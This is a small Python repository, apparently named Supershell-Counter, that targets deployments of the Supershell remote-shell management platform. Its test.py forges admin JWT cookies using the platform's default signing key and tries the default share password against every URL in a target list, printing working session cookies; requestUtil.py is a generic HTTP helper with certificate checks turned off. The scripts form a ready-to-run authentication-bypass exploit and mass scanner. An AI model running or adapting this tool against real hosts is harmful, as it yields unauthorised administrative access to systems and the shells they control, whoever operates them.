├── README.md
├── urlUtil.py
├── test.py
└── requestUtil.py


/README.md:
--------------------------------------------------------------------------------
1 | # Supershell-Counter
2 | 
3 | 
4 | [Supershell](https://github.com/tdragon6/Supershell) 反制-默认密钥：global_salt/share_pwd
5 | 
6 | ![image](https://github.com/passer-W/Supershell-Counter/assets/83850502/32c22e91-988f-4bd3-9293-d14e5d99686a)
7 | 


--------------------------------------------------------------------------------
/urlUtil.py:
--------------------------------------------------------------------------------
 1 | def get_urls(file, type=0):
 2 |     url_list = []
 3 |     file = open(file, "r")
 4 |     for i in file.readlines():
 5 |         i = i.strip().split(" ")[0].rstrip("/")
 6 |         if type == 0:
 7 |             if "http" in i:
 8 |                 url_list.append(i)
 9 |         else:
10 |             if not "http" in i:
11 |                 i = f"http://{i}"
12 |             url_list.append(i)
13 |     url_list = list(set(url_list))
14 |     return url_list
15 | 
16 | 
17 | def get_urls_str(string, key="http"):
18 |     url_list = []
19 |     for i in string.split("\n"):
20 |         if key in i:
21 |             if "http" in key:
22 |                 url_list.append(i.strip().split(" ")[0].rstrip("/"))
23 |             else:
24 |                 url_list.append(i.strip())
25 |     return url_list


--------------------------------------------------------------------------------
/test.py:
--------------------------------------------------------------------------------
 1 | import re
 2 | import time
 3 | 
 4 | import jwt
 5 | import tqdm
 6 | 
 7 | import requestUtil
 8 | import urlUtil
 9 | 
10 | 
11 | def get_jwt_token(username, salt, exp_time):
12 |     '''
13 |         获取jwt token
14 |     '''
15 |     exp = int(time.time() + exp_time)
16 |     data = {
17 |       "username": username,
18 |       "exp": exp
19 |     }
20 |     token = jwt.encode(payload=data, key=salt, algorithm='HS256')
21 |     return token
22 | 
23 | def login(url, token):
24 |     resp = requestUtil.get(url + "/supershell/client", cookies=f"token={token}", timeout=timeout, allow_redirects=False)
25 |     return (resp and "备忘录" in resp.text)
26 | 
27 | def burp(url):
28 |     for salt in ["Be sure to modify this key"]:
29 |         username = "admin"
30 |         token = get_jwt_token(username, salt, 999999)
31 |         if login(url, token):
32 |             print(f"[+] {url}/supershell/client [SALT] {salt} [COOKIE] token={token}")
33 | 
34 | def burp_share(url):
35 |     for password in ["tdragon6"]:
36 |         resp = requestUtil.post(url+"/supershell/share/shell/login/auth", header={"Content-Type": "application/json"}, data=f'{{"share_password":"{password}"}}', timeout=timeout)
37 |         if resp and "Set-Cookie" in resp.headers:
38 |             token = resp.headers["Set-Cookie"]
39 |             print(f"[+] {url}/supershell/client [SHARE] {password} [COOKIE] {token}")
40 |             # print(token)
41 |             # print(login(url, token))
42 | 
43 | 
44 | if __name__ == '__main__':
45 |     timeout = 1
46 |     urls = urlUtil.get_urls("url.txt")
47 |     for url in tqdm.tqdm(urls):
48 |         burp(url)


--------------------------------------------------------------------------------
/requestUtil.py:
--------------------------------------------------------------------------------
  1 | import re
  2 | import traceback
  3 | 
  4 | import requests
  5 | import warnings
  6 | 
  7 | from urllib3 import encode_multipart_formdata
  8 | # import test65_nsa
  9 | 
 10 | warnings.filterwarnings("ignore")
 11 | 
 12 | headers = {
 13 |     "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",
 14 |     "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
 15 |     "Accept-Encoding": "gzip, deflate"
 16 | }
 17 | 
 18 | proxy = {
 19 |     "http": "http://127.0.0.1:8080",
 20 |     "https": "http://127.0.0.1:8080",
 21 | }
 22 | 
 23 | # cookies = "test65_nsa.cookies"
 24 | cookies = ""
 25 | 
 26 | 
 27 | def get_cookies(cookie_str):
 28 |     cookie_dict = {i.split("=")[0].strip(): "=".join(i.split("=")[1:]).strip() for i in cookie_str.split(";")}
 29 |     return cookie_dict
 30 | 
 31 | 
 32 | def get(url, cookies=cookies, header=None, timeout=5, session="", allow_redirects=True, stream=False, proxable=False):
 33 |     f_headers = dict.copy(headers)
 34 |     if cookies == "":
 35 |         cookies = {}
 36 |     else:
 37 |         cookies = get_cookies(cookies)
 38 |     if header == None:
 39 |         header = {}
 40 |     f_headers = dict(header, **f_headers)
 41 |     if proxable:
 42 |         proxies = proxy
 43 |     else:
 44 |         proxies = {}
 45 |     try:
 46 |         if session == "":
 47 |             resp = requests.get(url, verify=False, headers=f_headers, cookies=cookies, timeout=timeout,
 48 |                                 allow_redirects=allow_redirects, stream=stream, proxies=proxies)
 49 |         else:
 50 |             resp = session.get(url, cookies=cookies, headers=f_headers, verify=False, timeout=timeout,
 51 |                                allow_redirects=allow_redirects, stream=stream, proxies=proxies)
 52 |         return resp
 53 |     except Exception as e:
 54 |         # print(e)
 55 |         return None
 56 | 
 57 | 
 58 | def post(url, data="", cookies=cookies, header=None, timeout=5, session="", files=None, proxable=False, allow_redirects=True, changeHeader=True):
 59 |     f_headers = dict.copy(headers)
 60 |     if cookies == "":
 61 |         cookies = {}
 62 |     else:
 63 |         cookies = get_cookies(cookies)
 64 |     if header == None:
 65 |         header = {}
 66 |     if not "Content-Type" in header and not files and changeHeader:
 67 |         header = dict(header, **{"Content-Type": "application/x-www-form-urlencoded"})
 68 |     if files == None:
 69 |         files = {}
 70 |     f_headers = dict(header, **f_headers)
 71 |     if proxable:
 72 |         proxies = proxy
 73 |     else:
 74 |         proxies = {}
 75 |     try:
 76 |         if session == "":
 77 |             resp = requests.post(url, cookies=cookies, data=data, headers=f_headers, verify=False, timeout=timeout,
 78 |                                  files=files, proxies=proxies, allow_redirects=allow_redirects)
 79 |         else:
 80 |             resp = session.post(url, cookies=cookies, data=data, headers=f_headers, verify=False, timeout=timeout,
 81 |                                 files=files, proxies=proxies, allow_redirects=allow_redirects)
 82 |         return resp
 83 |     except Exception as e:
 84 |         return None
 85 |         # print(e)
 86 | 
 87 | def put(url):
 88 |     return requests.put(url, verify=False)
 89 | 
 90 | class FileData:
 91 |     def __init__(self, header, data):
 92 |         self.header = header
 93 |         self.data = data
 94 | 
 95 | 
 96 | def get_file_data(filename="", filedata="", param="file", data=None):  # param: 上传文件的POST参数名
 97 |     if not data:
 98 |         data = {}
 99 |     if filename:
100 |         data[param] = (filename, filedata)  # 名称，文件内容
101 |     encode_data = encode_multipart_formdata(data)
102 |     file_data = FileData({"Content-Type": encode_data[1]}, encode_data[0])
103 |     return file_data
104 | 
105 | 
106 | def session():
107 |     return requests.session()
108 | 
109 | 
110 | def get_title(resp):
111 |     try:
112 |         try:
113 |             content = resp.content.decode()
114 |         except:
115 |             content = resp.content.decode("GBK", "ignored")
116 |         title = re.findall("<title>(.*?)</title>", content)[0]
117 |     except:
118 |         title = "[空标题]"
119 |     return title
120 | 
121 | 
122 | def get_ip(url):
123 |     if re.findall("http://(.*?)/", url):
124 |         return re.findall("http://(.*?)/", url)
125 |     else:
126 |         return re.findall("http://(.*)", url)
127 | 
128 | def print_info(resp):
129 |     if resp != None:
130 |         print (resp.url, resp.status_code, len(resp.text), get_title(resp))
131 | 
132 | 


--------------------------------------------------------------------------------